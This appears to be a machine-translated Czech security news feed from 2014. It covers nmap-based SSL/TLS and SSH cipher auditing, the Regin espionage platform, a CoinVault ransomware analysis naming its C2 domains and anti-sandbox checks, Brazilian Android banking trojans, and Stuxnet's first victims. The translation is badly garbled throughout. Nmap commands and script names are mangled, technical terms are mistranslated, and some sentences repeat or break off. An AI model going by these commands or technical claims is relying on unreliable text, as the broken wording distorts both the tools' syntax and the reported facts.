Vypláchnout Crypto Rats - Hledání "Bad Šifrování" na vaší sítě 1.12.2014 Viry Stačí, když lidé dostat kolem zavádění SSL, musíme odejít SSL! Není týden, jde koupit, že klient je mi zranitelnosti ptát SSL (TLS nebo častěji), nebo hledání problémů v jejich síti.
V nedávném případě, můj klient právě dokončil audit datových center / PCI, a měl jeden z jeho serverů přijít as pomocí SSL 2.0, což samozřejmě se již nepoužívá od roku 1996 - doporučení auditora byla aktualizace k SSL 3.0 (špatný doporučení , čtěte dál o). Když pak byl aktualizován, aby SSL 3.0 a byl znovu zkontrolován, skener samozřejmě našel problémy s * že * příliš - a doporučení ke změně aktualizovat TLS 1.1 nebo 1.2 - SSL 3.0 má svůj vlastní soubor otázek, včetně rozruchu kolem nedávný POODLE zranitelnost.
To ukazuje dvě věci ve skutečnosti:
1 / waaay příliš mnoho hodnocení se skládá z skenování cíl, a vkládání výstup nástroje skenování do závěrečné zprávy.
2 / V tomto případě osoba, psaní zprávy se buď nečetl text byli vkládání, nebo nebyla dostatečně znalý, aby pochopili, že aktualizace od SSL 2 SSL 3, nebylo dostane ke konečnému "dobrého" stavu. Hanba na ně v obou směrech!
Jako vedlejší poznámku, pokud v areálu hotelu (to bylo v interní síti zapamatovat) běžel starý dobrý HTTP, pak skener by to zjistila problém, a osoba za skeneru by se velmi pravděpodobně vynechal to úplně! (OOPS)
Mimochodem, můj klient je * skutečné * otázkou bylo, " jak můžeme kontrolovat naši síť pro zranitelné verze SSL a šifer, ale ne platit velké peníze za nástroj podnikového skenování nebo poradce? "
Moje odpověď byla (ten den) - NMAP samozřejmě!
Chcete-li zkontrolovat slabých nebo silných šifer na serveru nebo podsítě, použijte skript "ssl-enum-šifer"
Nmap pn -p443 isc.sans.edu --script = ssl-ENUM-šifry (Bojan kryté tohle v nějakém detailu v srpnu, v https://isc.sans.edu/diary/18513 )
Spuštění Nmap 6.47 (http://nmap.org) v 2014-11-27 09:42 východního standardního času
Nmap skenování zpráva za isc.sans.edu (66.35.59.249) hostitel je nahoru (0.097s latence). rDNS záznam pro 66.35.59.249: isc.sans.org PORT STATE SERVICE 443 / tcp open https | SSL-výčtu-kódy: | SSLv3: Ne Podporované šifry nalezeno | TLSv1.0: | šifry: | TLS_DHE_RSA_WITH_AES_128_CBC_SHA - silný | TLS_DHE_RSA_WITH_AES_256_CBC_SHA - silný | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - silný | TLS_RSA_WITH_3DES_EDE_CBC_SHA - silná | kompresory: | NULL | TLSv1.1: | šifry: | TLS_DHE_RSA_WITH_AES_128_CBC_SHA - silný | TLS_DHE_RSA_WITH_AES_256_CBC_SHA - silná | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - silný | TLS_RSA_WITH_3DES_EDE_CBC_SHA - silná | kompresory: | NULL | TLSv1.2: | šifry: | TLS_DHE_RSA_WITH_AES_128_CBC_SHA - silný | TLS_DHE_RSA_WITH_AES_256_CBC_SHA - silný | TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 - silný | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 - silný | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 - silný | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - silný | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 - silná | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 - silná | TLS_RSA_WITH_3DES_EDE_CBC_SHA - silná | kompresory: | NULL | _ alespoň síla: silný
Nmap provést: 1 IP adresa (1 hostitel nahoru) naskenovány 34,63sekunda
Můžete skenovat speciálně pro SSHv2 zařízení pomocí skriptu "sshv2.nse"
Jejda - to sken našel Server Admin kartu (iLO ekvivalent) v domácí síti, že jsem si myslel, že jsem se aktualizují (my špatný)
Nmap skenování zpráva za 192.168.122.246 Hostitel je nahoru (0.029s latence). PORT STATE SERVICE 443 / tcp open https | SSLv2: | SSLv2 podporované | šifry: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 | _ SSL2_RC4_128_EXPORT40_WITH_MD5 MAC Address : 00: E0: 81: CE: 9E: 74 (Tyan Computer)
NMAP má také skripty ssl-heartbleed skript (pokud jste stále zaměřuje na to), a má ssl-pudl skript, ale budete muset stáhnout, že jeden z jejich stránky skript na http://nmap.org/nsedoc / scripts / - to není v základní instalace.
A když už jsme u toho, podívejte se na šifry podporu na jakémkoliv SSH povolen zařízení v síti - budete pravděpodobně překvapeni, co najdete. Například, to je správa rozhraní mé domácí firewall - nejsem nadšený 3DES-CBC a podpora MD5, ale myslím, že je to důvod, proč je tu nový firewall v krabici, jen čeká na volný den, pro mě vyměnit to v myslím.
Spuštění Nmap 6.47 (http://nmap.org) v 2014-11-27 17:02 východního standardního času
Nmap zprávu kontroly na 192.168.122.1 Hostitel je nahoru (0.0020s latence). PORT STATE SERVICE 22 / tcp open ssh | SSH2 výčtu-algos: | kex_algorithms: (1) | RSA-skupina1-SHA1 | server_host_key_algorithms: (1 ) | ssh-rsa | encryption_algorithms: (4) | aes128-CBC | 3DES-CBC | aes192-CBC | AES256-CBC | mac_algorithms: (4) | HMAC-SHA1 | HMAC-sha1-96 | HMAC-md5 | hmac- md5-96 | compression_algorithms: (1) | _ žádný MAC Address: C8: 4C: 75: DA: 31: E3 (Cisco Systems)
Nmap provést: 1 IP adresa (1 hostitel nahoru) naskenovány 47,39sekunda
Nebo, pro skutečné zjevení, skenovat podsítě pro SSHv1 mobilních zařízeních - na vědomí, že tato kontrola (a předchozí), předpokládá, že vaše SSH služba je na portu 22. V "nulovou znalostí" skenování, měli byste samozřejmě snímat širší rozsah portů (všechny z nich v případě, že je čas na to):
Tato kontrola nenašel nic v mém domě, ale to vždycky * * najde věci na místě klienta!
Co crypto podpora problémy jste zjistili, když jste kontrolován na ně? A jak dlouho si věc, kterou tyto problémy byly tam? Prosím, podělte se o svůj příběh pomocí našeho odkazu komentář!
Nový vyspělý špehovací virus se umně skrýval. Vyrobila ho asi vláda 27.11.2014 Viry
Společnost Symantec oznámila objev zcela nového počítačového viru, který od roku 2008 napadal počítače, aby z nich získával tajné údaje. Bezpečnostní analytici jsou softwarem fascinováni pro jeho komplexnost. Škodlivý prográmek (malware) známý jako Regin byl podle společnosti Symantec systematicky využíván pro špionážní kampaně proti celé řadě mezinárodních cílů nejméně od roku 2008. Malware typu Trojský kůň pronikal do počítačů, kde sbíral dostupná data a vytvořil zadní vrátka. Těmi pak mohl do napadeného počítače proniknout útočník, aby zde prováděl další akce.
Jak Regin funguje Složitost viru Regin ve schématu firmy Symantec ukazuje jeho pětistupňovou strukturu. Regin je vícestupňový virus, kde je každý stupeň s výjimkou prvního skrytý a zašifrovaný. Spuštěním první vrstvy se nastartuje řetězec dešifrování a nahrávání každé další fáze v rámci pěti etap. Každý jednotlivý stupeň přitom poskytuje jen velmi málo informací o kompletním balíčku. Přitom jen získáním obsahu všech pět fází je podmíněna analýza, která umožní pochopit celou hrozbu.
Regin je značně složitý virus, jehož struktura se podle analytiků vidí jen zřídka, a ukazuje tak na značnou technickou vyspělost jeho tvůrce. Dokáže se přizpůsobit široké škále možností v závislosti na tom, jaký cíl napadá.
„Regin používá modulární přístup, což mu umožňuje načíst právě ty funkce, které budou na míru napadenému cíli. Tento modulární přístup už jsme viděli u jiného náročného malwaru, jako jsou například Flamer a Weevil, zatímco jeho vícefázová architektura je podobná jako u rodiny virů Duqu/Stuxnet,“ vysvětlují složitost viru výzkumníci ze Symantecu.
K tomu je tento malware vybaven funkcemi, které nabízejí vysoce efektivní hromadnou správu a dozor. Virus Regin tak může být velice účinný při použití v rámci rozsáhlých špionážních operací proti vládním organizacím, provozovatelům infrastruktury, podnikům, výzkumným pracovníkům, ale i soukromým osobám. Je pravděpodobné, že vývoj trval měsíce, ne-li roky. Jeho autoři šli podle Symantecu až do krajnosti, aby zakryli stopy. Jeho schopnosti a velké množství vynaložených finančních prostředků naznačují, že je to jeden z důležitých kyberšpionážních nástrojů používaných některou ze státních agentur. Že vlády využívají ve velkém špehovací programy, není žádná novinka. Patrně i Slovensko nebo Česko utrácejí miliony za šmírovací počítačové viry.
Nejvíce jsou virem Reign postiženy Rusko a Saudská Arábie. Nejvíce jsou virem Reign postiženy Rusko a Saudská Arábie. Virus Regin je unikátní i tím, že se řadu let šířil po celém světě nepoznán. Podle výzkumů firmy jsou jím nejvíce zasaženy Rusko, Saudská Arábie, Mexiko a Irsko. Z evropských států má zhruba pětiprocentní podíl ještě Belgie.
Virus byl zaznamenán z téměř 50 procent u soukromých osob a malých podniků, což je logické, protože jich je mnohem více než velkých institucí. Překvapením může být, že 28 procent všech napadených systémů jsou telekomunikační služby, kde patrně docházelo k odchytávání hovorů.
Regin Cyberespionage Platforma Spies v sítích GSM 25.11.2014 Viry Vědci odhalili složité špionážní platformu připomínající Duqu, které bylo použito nejméně od roku 2008 nejen špehovat a výpis e-mailů a dokumentů z vládních agentur, výzkumných institucí a bank, ale také ten, který se zaměřuje na operátory GSM sítí s cílem zahájit další útoky.
Dnes ráno, že vysvětluje tento aspekt Kaspersky Lab zveřejnila zprávu útoku platformě Regin , která byla zjištěna na počítačích se systémem Windows s 27 oběťmi organizací ve 14 zemích, většina z nich v Asii a na Středním východě. Kromě politických cílů, výzkumníci Kaspersky Lab identifikovat belgický cryptographer Jean Jacques Quisquater jako jednu ze svých konkrétních obětí, spolu s nejmenovaným výzkumnou instituci, která byla také infikované jinými nebezpečnými špionážní malware, včetně masky / Careto, Turla, Itaduke a Farma zvířat.
Počáteční infekce vektory jsou neznámé, ale Kaspersky Lab spekuluje, že v několika málo případech, útočníci použili prohlížeč zero-day exploit. Počáteční infekce vektory jsou neznámé, ale Kaspersky Lab spekuluje, že v několika málo případech, útočníci použili prohlížeč zero-day exploit, aby sedět v pozici man-in-the-middle a sifon provoz z oběti.
"Pro některé z obětí jsme pozorovali, nástroje a moduly určené pro boční pohyb. Zatím jsme se setkali žádné zneužití. Moduly replikace jsou zkopírovány do vzdálených počítačích pomocí sdílených složek pro správu systému Windows a pak popraven, "napsal vědci. "Je zřejmé, tato technika vyžaduje administrátorská práva uvnitř sítě oběti. V několika případech infikovaných počítačů byly také řadiče domény systému Windows. Cílení na správce systému, prostřednictvím webových využije je jednoduchý způsob, jak dosáhnout okamžitý přístup pro správu celé sítě. "
Útoky APT stylu se vyznačují svou vytrvalost a schopnost tiše krást elektronické dokumenty, které jsou rozloženy na bok na síti a zahájit další útoky na povel. GSM aspekt Regin je obzvláště pozoruhodné a nebezpečné, říkají výzkumníci.
Kaspersky_Lab_geo_regin_eng
"V dnešním světě, jsme se stali příliš závislí na mobilních telefonních sítí, které jsou založeny na starověkých komunikačních protokolů s malou nebo žádnou bezpečnost k dispozici pro koncového uživatele," řekl Costin Raiu, ředitel Global Research a Analysis Team na Kaspersky Lab. "Ačkoli všechny GSM sítě mají mechanismy, které umožňují vložené subjekty, jako je vymáhání práva ke sledování podezřelých osob, ostatní strany unést tuto schopnost a jeho zneužití, aby zahájily různé útoky proti mobilní uživatele."
GSM je zkratka pro Global System for Mobile Communications a je výchozím standardem pro mobilní sítě používané většinou světových telekomunikací. Útočníci byli schopni ukrást pověření z interního řadiče GSM základnové stanice patřící do velké telekomunikačního operátora, který jim umožnil přístup k GSM buněk v této konkrétní síti, řekl Kaspersky Lab. Řídících stanic spravovat hovory, jak se pohybují po mobilní síti, přidělování zdrojů a mobilní datové přenosy.
"To znamená, že by měli přístup k informacím o tom, které hovory jsou zpracována určitou buňku, přesměrovat tyto hovory na jiné buňky, aktivovat sousedních buněk a provádět další útočné činnosti," napsal výzkumníci Kaspersky Lab. "V současné době, útočníci za Regin jsou jediní, je známo, že byli schopni dělat takové operace."
Výzkumníci Kaspersky zveřejnila výňatky z protokolu Base Station Controller se datuje do roku 2008, který obsahoval příkazy, které by umožnily třetí strana manipulovat přesměrování hovoru, aktivovat nebo zastavit buňky v síti GSM a přidat buněk sousedy k síti mimo jiné příkazy. Protokol také obsahoval pověření, které patří do technických účtů.
Backdoors byly také stanoveny příkazem infrastrukturou útočníků; sdělení bylo těžce šifrována a komplexní, je sníženo riziko, že by se dodržovat. Stroje na okraji sítě působit jako most mezi oběťmi uvnitř sítě a příkaz infrastruktury.
"Většina obětí komunikovat s jiným strojem ve své vlastní interní síti pomocí různých protokolů, jak je uvedeno v konfiguračním souboru. Patří mezi HTTP a sítě potrubí systému Windows, "uvádí se ve zprávě Kaspersky. "Účelem tohoto komplexního infrastruktury je dosáhnout dvou cílů: dát útočníkům přístup hluboko do sítě, případně obcházet vzduchové mezery; a omezit co nejvíce provoz na C & C. "
Regin je nasazen v pěti etapách dává útočníkům hluboký přístup k obětovaného síti s každou fázi načítá z následujících částí útoku. Moduly v první fázi jsou pouze spustitelný uložený v počítači oběti, a oni jsou všichni podepsali s falešnými digitálních certifikátů tvrdili, že jsou od společnosti Microsoft a Broadcom. Podrobnosti o každé fázi, stejně jako ukazatele kompromisu byly publikovány od Kaspersky Lab ve své zprávě .
Specialisté ze Symantecu našli starého ale velmi funkčního trojského koně Regin
24.11.2014 Viry Nového sofistikovaného červa s názvem "Regin" odhalili bezpečnostní experti ze společnosti Symantec. Vir je natolik důmyslný, že se Symantec domnívá, že Regin byl pravděpodobně vyvinul nějakým stát průmyslové špionáži.
Podle odhadů Symantecu byl Regin využíván ke špehování cizích vlád, operátorů, firem i jednotlivců minimálně od roku 2008.
„Regin je na technické úrovni, která se málo vidí,“ uvedl Symantec včera v prohlášení s tím, že červ byl podle všeho vyvinut vládní agenturou nějakého státu. Podle amerických expertů je Regin v současné době využíván v minimálně deseti státech: Rusku, Saudské Arábii, Mexiku, Irsku, Indii, Afghanistánu, Íránu, Belgii, Rakousku a Pákistánu.
Regin je „speciálně upravenou verzí trojského koně s celou řadou schopností, které lze využít u rozmanitých cílů,“ uvedl Symantec s tím, že „červ svým tvůrcům poskytuje silný nástroj ke špehování“. Vývoj Regin trval měsíce, pokud ne roky a jeho autoři údajně odvedli skvělou práci, aby za sebou zahladili stopy.
První verze Regin byla použita ke špehování několika organizací mezi lety 2008 a 2011 a nová verze se podle Symantecu objevila v roce 2012. Téměř v polovině sledovaných případů Regin infikoval sítě jednotlivců a malých firem, jsou však zaznamenány i útoky na velké firmy podnikající v telekomunikačním sektoru s cílem odposlouchávat celou infrastrukturu. Červ se skládá z pěti oddělených modulů, které jsou až na ten první samostatně zašifrované. Jednotlivé moduly se aktivují postupně jako domino a k analýze a pochopení celého červa je třeba získat všech pět modulů.
Tento způsob fungování se velmi podobá červu Duqu/Stuxnet. Jednotlivé moduly jsou pak upravovány pro konkrétní cíle - experti objevili například speciálně upravené části kódu zaměřené na odposlouchávání zařízení v telefonních ústřednách.
„Regin je velmi pokročilým červem a je využíván k systematickému sběru dat. Vývoj a provozování červa vyžaduje značnou investici času a peněz, což naznačuje, že za tím stojí nějaká země,“ uvedl Symantec. „Regin je navrhnut k dlouhodobému špehování na pečlivě zvolené cíle.“
Symantec podle svých slov věří, že „několik modulů Regin nebylo zatím objeveno a mohou existovat i další varianty tohoto červa“. Experti proto pokračují v analýze a pokud zjistí něco nového, vydají další prohlášení. Jak dodal Symantec, „hledání těchto škodlivých kódů je výzvou pro celý bezpečnostní průmysl.“
Existenci Regin potvrdila i společnost F-Secure, která jej údajně sleduje již několik let.
Noční můra v Malware ulici 23.11.2014 Viry
spontiroli Další ransomware byl spatřen v přírodě v poslední době, značkových "CoinVault" . Ten zahrnuje některé zajímavé detaily stojí za zmínku, včetně podivné charakteristikou nabízí volné dešifrování jednoho z rukojmích souborů jako gesto dobré vůle .
CoinVault
Technicky, malware autoři vzali hodně opatření ke zpomalení analýzu vzorku. I když to bylo děláno s .NET společnosti Microsoft, chvíli trvá, než dosáhne jádro jejich škodlivé aplikace. Po otevření první vzorek "IL Spy", zjistíme, že se program spustí pomocí řetězce klíč, který je předán metodě šifrování, což v konečném důsledku získat spustitelný kód.
Byte pole je předán jako parametr "EncryptOrDecrypt" způsobem, který ve spojení s klíčem vypíše finále byte pole s tolik potřebnou kódem malware.
Implementace těchto funkcí Visual Studio je stejně snadné jako kopírovat / vložit, a tak jsme provést metody nashromáždils ze zdrojového kódu a nastavit zarážku ověřit, jaká je metoda dešifrování dělá. "77", "90" v desítkové nám říká, že jsme na správné cestě, protože při převodu těchto čísel na šestnáctkové dostaneme "4D", "5A", což je magické číslo pro DOS spustitelné soubory zjištěných ASCII řetězec " MZ ". My vypsat všechny byty do spustitelného souboru v disku pro další analýzu.
Dostaneme soubor s názvem " SHIELD runner " , které slouží jako pomocné aplikace pro "RunPE". Aplikace "RunPE" slouží k spouštět soubory za běhu, což znamená, že paměť proud je vytvořen ze vstupu a popraven přímo bez předchozího uložení souboru na disk. To je užitečné pro malware spisovatele, kteří chtějí, aby se zabránilo zanechání stop za sebou, a jak brzy uvidíte, že to není všechno tento soubor má nabídnout.
I když budeme pokračovat v našem vyšetřování ransomware kódu, je to pozoruhodný řetězec zakotven v SHIELD běžec spustitelný soubor, D: \ Users \ Dennis ... " .
Stejně jako dříve, řetězec klíč a bajtové pole se používají k výrobě další spustitelný soubor. Jak můžete vidět, že útočníci šli do krajnosti, aby se zpomalil analýzu a skrýt škodlivý náklad tak dlouho, jak je to možné .
Nejen, že máme funkci obvyklého "RunPE", ale také pěkný další sadu metod, které vám pomohou malware detekovat analytické nástroje a virtualizovaná prostředí. Kontroluje "Sandboxie", "Wireshark", "Winsock Packet Editor" a dokonce i kontroluje, zda název tohoto stroje je "MALTEST" . Naštěstí žádná z těchto podmínek splněna v mém okolí, takže jsme dobré jít.
Ale počkat .... je toho víc! Detekce virtualizovaném prostředí způsobí provedení se zastavit a škodlivý užitečné zatížení má být skryty.
Pomocí PowerShell, budeme kontrolovat, zda malware může skutečně odhalit naše životní prostředí. Zdá se to může, takže budeme muset provést některé jednoduché úpravy, aby mohl pokračovat v procesu analýzy.
Můžeme opravit snadno od VMware konfigurace VMX souboru, nastavení volby "SMBIOS.reflectHost = TRUE". Znovu Úplné PowerShell kontroly, jsme svědky dobré zprávy, a jsou připraveni jít ještě dál.
Opakování procesu řetězce klíče a byte pole dešifrování a dumping v pravý čas paměť vyplatí a my nakonec skončí s sadu souborů, které budou použity v průběhu infekce.
V CoinVault "Locker" má dvě hlavní podoby Windows: hlavní, kdo nám říká, platit za účelem získání souborů oběti a "frmGetFreeDecrypt", který se používá k dešifrování jeden ze souborů oběti jako způsob, jak dokázat, že můžeme ve skutečnosti obnovit náš drahocenný informace, pokud budeme dodržovat včas.
Nicméně předtím, než na "Locker v analýze budeme muset (alespoň trochu) deobfuscate. Malware spisovatelé zobrazit nějaký smysl pro humor zde: v případě, že analytik prošla tímto větších problémů k dosažení tohoto bodu se zdá, že je vítán, jak navrhuje fráze, "Vaše nejhorší noční můra" . Kromě toho, že jsou dostatečně chce opustit banner signalizaci mlžení nástroj oni používali. V tomto případě se jedná o stále populárnější "konfuzoru", ve znění 1.9.0.0.
Jistě, je to matoucí ... ale můžeme udělat to lépe. Tak jsme se jít od něčeho, co se podobá čínské rukopis Zdrojový kód.
Nyní můžeme vidět, mezi mnoha (mnoha) metod a delegátů uvnitř sestavy někteří příslušným kódem, pokud jde o šifrování souborů. .NET Je "System.Security.Cryptography.RijndaelManaged" namespace se používá (mimo jiné), odhalující symetrické funkce šifrování.
Můžeme dostat i pohled na to, jak se PRNG realizována a některé vnitřní podrobnosti o škodlivé aplikace.
Když jsme se konečně Zobrazí se "Locker" spustitelný soubor, spojení se provádí dynamické domény. V rámci této analýzy, dvě adresy byli přítomni: "cvredirect.no-ip.net" a "cvredirect.ddns.net" . Ty jsou v současné době v režimu offline, a to omezuje funkčnost "Locker", protože při kontrole dopravní analýzy jsme mohli vidět, že hardware ID je poslán do C & C za účelem využití dynamického šifrování souborů heslo. Myslím, že nyní můžeme pochopit, proč je malware kontrola Wireshark v systému. Koneckonců, by se zločinci nechtějí, abyste nahlédnout na to, jak je jejich podnikání dostat udělat.
V tomto bodě, pokud vše dobře dopadlo (pro zločinci), vaše osobní dokumenty a soubory byly zašifrovány a platba je vyžadována méně než 24 hodin, nebo cena se zvedne. Bitcoin adresa používá dynamický příliš, takže sledování finančních prostředků mnohem složitější, než je obvyklé.
MainScreen
Je to vaše nejhorší noční můra? Pokud nemáte aktualizovaný anti-malware apartmá a (pouze v případě, že), zálohu nejdůležitějších souborů, může to být jen.
Kaspersky detekuje rodinu jako "Trojan-Ransom.Win32.Crypmodadv.cj" . Už jsme viděli podobné škodlivé aplikace v minulosti (pokud jde o funkčnost), jako je například "TorrentLocker", a některé PowerShell ransomware, ale množství úsilí investované do této jedné za účelem ochrany kód ukazuje, že zločinci jsou využití již vytvořených knihoven a funkce aby se zabránilo objevování Ameriky.
Nová aplikace Amnesty International umožní zjistit přítomnost spyware v systém
21.11.2014 Viry Organizace Amnesty International vydala bezplatný program, který umí zjistit, zda nemáte v systému nainstalován špionážní software.
Aplikace s názvem Detekt je podle Amnesty International (AI) určena k fungování vedle běžných antivirových programů. Jak uvádí AI, Detekt je v prvé řadě zaměřen na detekování sofistifikovaných špionážních programů (tzv. spyware) používaných vládami po celém světě, které umí například bez vědomí uživatelů pořizovat obrázky z webkamer či pomocí integrovaných mikrofonů naslouchat jejich konverzacím.
AI vyvíjela Detekt dva roky a podle Tanyi O´Carrollové aplikace umí odhalit špinonážní software, na nějž běžné bezpečnostní programy nestačí. Aplikace, na níž kromě AI pracovali také experti z Electronic Frontier Foundation, Privacy International a Digitale Gesellschaft, je dostupná zcela zdarma. Skupina se navíc závazala k tomu, že bude Detekt pravidělně aktualizovat a rozšiřovat jeho funkce.
První verze programu běží pouze na operačním systému Windows, jelikož lidé, kteří jsou nejčastěji monitorování, podle O´Carrollové používají právě tento operační systém. Spyware používají vládní organizace celé řady zemí, v posledním roce se objevily skandály se špehováním například v Bahrajnu, Sýrii, Etiopii, Vietnamu, Německu či Severní Koreji.
„Je snazší vyjmenovat ty země, které špionážní nástroje nepoužívají, než ty, které ano,“ řekla O´Carrollová s tím, že na trhu se spywarem používaným vládami se ročně protočí pět miliard dolarů. A podle AI je na čase, aby bylo toto obchodování lépe regulováno.
Profesor Alan Woodward z University of Surrey, který často radí různým vládám v bezpečnostních otázkách, však v rozhovoru pro BBC pochyhoval o tom, jak se skupině neziskových organizací podaří Detekt dále vyvíjet.
„Není to jejich hlavní byznys,“ řekl Woodward. „Budou svůj software aktualizovat dostatečně často? Různé varianty spywaru se totiž objevují každý den.“ Woodward také zapochyboval o tom, jak účinný bude Detekt proti režimům, kteří namísto komerčních spywarových aplikací používají svůj vlastní speciální kód.
Jak uvedl německý bezpečnostní odborník Claudio Guarnieri, který na tvorbě programu Detekt pracoval, špionážní software vyvíjí čím dál více firem.
„Lidé si myslí, že použití spywaru vládními agenturami je ojedinělé, a to není pravda,“ řekl Guarnieri. „Spyware bývá používán jako poslední řešení při špehování v případech, kdy se nelze dostat k zašifrovaným datům. Opravdovým problémem je však to, že se nikdo veřejnosti nezeptal, zda je používání spywaru přijatelné.“
Spyware se pravidelně rozšiřuje v e-mailových přílohách nebo infikuje uživatele při přístupu na speciálně upravené stránky.
Brazilský Trojan Bankéři - nyní na Android Play Store! 20.11.2014 Viry
Trvalo nějaký čas, ale jsou to konečně tady - brazilské zločinci začaly cílit své útoky vůči uživatelům mobilního bankovnictví. Tento týden jsme spatřili první trojského bankéře cílení brazilské uživatelům zařízení se systémem Android. Dva Škodlivé aplikace chtěly projít pro aplikace od místních bank byly hostovány na Google Play.
en_generic_rgb_wo_60
Podle FEBRABAN (místní federace bank), více než 6 milionů Brazilců se pomocí mobilního bankovnictví pravidelně, takže není překvapením, že malware cílení mobilních uživatelů. Ve skutečnosti, Brazílie byl korunován zemi nejvíce napaden bankovní malware v našem Q3 vývoje hrozba zprávy :
Q3_2014_MW_Report_14Tento krok brazilskými padouchy byla předvídatelná a čekal jako přirozený vývoj v místním malwaru scény. V roce 2012 jsme byli svědky útoků pomocí phishingových stránek v mobilním formátu a nyní taška chlap používání názvu "Governo federální" (federální vláda) byl schopen publikovat 2 Škodlivé aplikace v obchodě Play:
Obě aplikace používá název dvou velmi populárních veřejných brazilských bank - první aplikace byla zveřejněna dne 31.října st a registrován 80 zařízení . Druhá byla zveřejněna 10.listopadu tis a měl jen 1 instalace .
Chcete-li vytvořit škodlivý app, (líný) špatný člověk se rozhodl použít "App Inventor": bez platforma, která umožňuje komukoliv vytvořit si vlastní mobilní aplikace pro Android, žádné technické znalosti potřebné. Výsledkem je aplikace, velké velikosti a plné zbytečné kód . Ale obě aplikace měla tu funkci, pro načtení loga cílových bank a otevřete snímek -. Stránku phishing naprogramován tak, aby zachytit pověření uživatele Jednoduché, ale efektivní , protože mobilní uživatelé bankovnictví v Brazílii stále používat jeden ověřování, bez žetonů či OTP, kde jsou požadovány pouze číslo účtu a heslo.
Tyto phishingové stránky cílené bank konaly na pirát internetových stránkách. Dobrá duše je odstranil a vložil upozornění na návštěvníky s uvedením: "Este é um aplicativo Falso, denuncie este app" , což znamená "To je falešná aplikace, oznamte to prosím" . V důsledku toho, když uživatel stáhne, nainstaluje a otevře falešné bankovní aplikaci, tato zpráva je zobrazena uvnitř, namísto původního phishing stránku:
Jsme uváděli obě aplikace na Google, a oni okamžitě odstranil je z Play Store. Zjistíme, jak aplikace jako Trojan-Banker.AndroidOS.Binv.a (MD5s: 00C79B15E024D1B32075E0114475F1E2 a A18AC7C62C5EFD161039DB29BFDAA8EF) a my jsme zcela jisti, že se jedná pouze o první primitivní pokusy o mnoho víc.
Stuxnet: Bez oběti
17.11.2014 Viry Totožnost společností, na něž se první známý kybernetické zbraně
By skvěle na11. listopadu 2014 11:30 PUBLIKACE
BOTNETY CYBER ŠPIONÁŽ KYBERNETICKÉ ZBRANĚ STUXNET CÍLENÝCH ÚTOKŮ ZRANITELNÁ MÍSTA A VYUŽÍVÁ Cyber-sabotážní operace Stuxnet zůstává jedním z nejoblíbenějších diskusních témat bezpečnostních výzkumníků všude. Zvažoval první známý kybernetické zbraně, Stuxnet zaměřena na íránský jaderný program pomocí jemné a dobře navržený mechanismus.
Pro pozadí, viz naše předchozí zprávy o Stuxnet sága:
Den Stuxnet zemřel Myrtus a Guava: Episode 1 Myrtus a Guava: Episode 2 Myrtus a Guava, Episode 3 Myrtus a Guava, Episode 4 Myrtus a Guava: Episode 5 Myrtus a Guava, Episode MS10-061 Myrtus a Guava: epidemie, trendy, čísla Zpět na Stuxnet: The Missing Link Jedním z důvodů, proč se k tomuto tématu Stuxnet je publikace (11.11.2014) z knihy " Countdown to Zero Day "novinářem Kim Zetter.
great_stuxnet_01
Jsme velmi nadšeni knihu, která obsahuje nové a dosud utajované informace o Stuxnet. Některé informace je vlastně založena na rozhovorech vedených Kim Zetter se členy Kaspersky Lab je Global Research a Analysis Team. Pro doplnění knihy vydání, rozhodli jsme se rovněž zveřejní nové technické informace o některých dosud neznámých aspektů útoku Stuxnet.
I přesto, že Stuxnet byl objeven před více než čtyřmi lety, a byl podrobně studován s vydáním mnoha výzkumných prací. Stále je však není známo, jisté to, co objekt byl původně zaměřen červa. Je velmi pravděpodobné, že Stuxnet měla vliv na motory, které pohánějí obohacování uranu odstředivky. Ale tam, kde se tyto odstředivky se nachází - v závodě v Natanzu, nebo snad v Fordó? Nebo nějaké jiné místo?
Příběh nejstarší známé verze červa Stuxnet - "0,5" - je mimo rozsah tohoto příspěvku; budeme soustředit na nejznámějších variant vytvořených v letech 2009 a 2010. (Rozdíly mezi nimi jsou popsány v naší publikaci 2012 - Zpět na Stuxnet: odkaz chybí ) .
V únoru 2011, Symantec zveřejnila novou verzi svého W32.Stuxnet Dossier zprávě . Po analýze více než 3000 soubory červa, Symantec zjistila, že Stuxnet byl distribuován prostřednictvím pěti organizací , z nichž někteří byli napadeni dvakrát - v letech 2009 a 2010.
Screenshot ze zprávy společnosti Symantec
Screenshot ze zprávy společnosti Symantec
Odborníci společnosti Symantec se podařilo extrahovat tyto informace kvůli zvědavý rys červa. Při napadení nového počítače, Stuxnet ukládá informace o názvu infikovaného systému, Windows domény a IP adresu. Tyto informace jsou uloženy v interní deníku červa a je rozšířen o nové údaje, kdy je další obětí nakažený. V důsledku toho, informace o dráze, kterou urazí šnekem se nachází uvnitř Stuxnet vzorků a použity ke stanovení, ze kterého počítač infekce začala šířit.
Příklad informací naleznete v souboru Stuxnet
Příklad informací naleznete v souboru Stuxnet
I když Symantec nezveřejnila jména organizací ve své zprávě, tato informace je zásadní pro správné pochopení toho, jak byla rozdělena červ.
Shromáždili jsme Stuxnet souborů po dobu dvou let. Po analýze více než 2000 těchto souborů, jsme byli schopni identifikovat organizace, které byly prvními oběťmi červa různých variantách v letech 2009 a 2010. Možná, že analýza jejich aktivity může vysvětlit, proč se staly "pacienti nula" (originál, nebo nula, oběti).
"Doména"
Verze Stuxnet 2009 (budeme odkazovat na to, jak Stuxnet.a) byl vytvořen na 22. června 2009. Tato informace je přítomen v těle červa - v podobě hlavního modulu datem kompilace. Jen pár hodin po tom, červ napaden svůj první počítač. Takový krátký časový interval mezi vytvořením souboru a infikování první počítač téměř úplně vylučuje infekci přes USB - z USB klíčenky prostě nemůže splnily od autorů červa k organizaci pod útokem v tak krátkém čase.
Infikovaný počítač měl název "KASPERSKY", a to byl součástí domény "ISIE".
great_stuxnet_04
